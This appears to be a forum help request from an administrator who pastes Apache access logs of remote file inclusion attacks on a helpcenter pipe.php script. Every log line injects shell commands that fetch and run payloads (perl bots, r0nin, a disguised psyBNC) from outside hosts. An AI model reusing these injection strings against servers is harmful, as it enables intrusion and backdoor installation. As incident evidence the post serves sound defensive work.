Trijan found.

2025-04-11

I noticed a process running that I knew was wrong it was
r0nin and so I processed my logs and this is what I have. Looks like they installed or tried to install more than that, Dam mod_security rules didn't stop this one for some reason. What can anyone tell me about the files they downloaded what else should I be looking for I deleted the r0nin from /dev/shm and there was nothing else there and /tmp is clean.

219.93.174.100 - - [01/Jan/2005:09:38:58 -0800] "GET /helpcenter//inc/pipe.php?HCL_path=http://rexix.altervista.org/yc/pro18.txt?&cmd=cd%20/var/tmp;wget%20spykid.homelinux.com/mafia.pl;perl%20mafia.pl;ps%20-aux; HTTP/1.1" 406 361 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
80.181.124.63 - - [02/Jan/2005:06:01:19 -0800] "GET /helpcenter/inc/pipe.php?HCL_path=http://rexix.altervista.org/yc/pro18.txt?&cmd=cd%20/tmp;mkdir%20.bashrc;cd%20.bashrc;wget%20http://www.psybnc.info/download/precompiled/psyBNC2.3.1-8.precompiled.tar.gz;tar%20-xzvf%20psy*gz;rm%20-rf%20%20psy*.gz;mv%20psybnc%20...;cd%20...;mv%20psybnc%20httpd\"%20\";chmod%20777%20httpd\"%20\";wget%20http://frusz.altervista.org/psyconf;mv%20psyconf%20psybnc.conf;./httpd\"%20\" HTTP/1.1" 406 360 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
80.181.124.63 - - [02/Jan/2005:06:01:32 -0800] "GET /helpcenter/inc/pipe.php?HCL_path=http://rexix.altervista.org/yc/pro18.txt?&cmd=id;wget HTTP/1.1" 406 360 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
80.181.124.63 - - [02/Jan/2005:06:02:52 -0800] "GET /helpcenter/inc/pipe.php?HCL_path=http://rexix.altervista.org/yc/pro18.txt?&cmd=cd%20/tmp;mkdir%20.bashrc;cd%20.bashrc;wget%20http://www.psybnc.info/download/precompiled/psyBNC2.3.1-8.precompiled.tar.gz;tar%20-xzvf%20psy*gz;rm%20-rf%20%20psy*.gz;mv%20psybnc%20...;cd%20...;mv%20psybnc%20httpd\"%20\";chmod%20777%20httpd\"%20\";wget%20http://frusz.altervista.org/psyconf;mv%20psyconf%20psybnc.conf;./httpd\"%20\" HTTP/1.1" 406 360 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
80.181.124.63 - - [02/Jan/2005:07:03:51 -0800] "GET /helpcenter/inc/pipe.php?HCL_path=http://rexix.altervista.org/yc/pro18.txt?&cmd=mkdir%20/tmp/.bashrc;cd%20/tmp/.bashrc;wget%20http://www.mundialstudio.fot.br/priv/r0nin;chmod%20777%20r0nin;./r0nin HTTP/1.1" 406 360 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
201.2.55.133 - - [03/Jan/2005:07:50:50 -0800] "GET /helpcenter/inc/pipe.php?HCL_path=http://geocities.yahoo.com.br/soloinotna/cmd.txt?&cmd=cd%20/dev/shm;wget%20http://www.geocities.com/soloinotna/irohide.tgz HTTP/1.1" 406 360 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
219.93.174.103 - - [05/Jan/2005:06:00:02 -0800] "GET /helpcenter/inc/pipe.php?HCL_path=http://rexix.altervista.org/yc/pro18.txt?&cmd=cd%20/var/tmp;wget%20http://spykid.homelinux.com/darkman.pl;perl%20darkman.pl;ps%20-aux; HTTP/1.1" 406 360 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
219.93.174.100 - - [05/Jan/2005:06:22:49 -0800] "GET /helpcenter/inc/pipe.php?HCL_path=http://rexix.altervista.org/yc/pro18.txt?&cmd=cd%20/var/tmp;wget%20http://spykid.homelinux.com/darkman.pl;perl%20darkman.pl;ps%20-aux; HTTP/1.1" 406 360 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
200.95.36.7 - - [09/Jan/2005:14:30:43 -0800] "GET /helpcenter/inc/pipe.php?HCL_path=http://mx.geocities.com/razorkron/cmd.txt?&cmd=cd%20/tmp;wget%20tbc-labz.org/bindz;%20chmod%20777%20bindz;%20./bindz HTTP/1.1" 406 360 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; iebar; SV1)"
200.181.49.203 - - [21/Jan/2005:10:59:34 -0800] "GET /helpcenter/inc/pipe.php?HCL_path=http://www.bailaora.com.br/contador/cmd?&cmd=cd%20/dev/shm;wget%20http://www.geocities.com/keikenbot/irohide.tgz HTTP/1.1" 406 360 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.181.49.203 - - [26/Jan/2005:06:26:12 -0800] "GET /helpcenter/inc/pipe.php?HCL_path=http://geocities.yahoo.com.br/keikenbot/cmd.txt?&cmd=cd%20/dev/shm/;wget%20http://www.smooth-creations.com/iB_html/uploads/backup/download/r0nin HTTP/1.1" 406 360 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"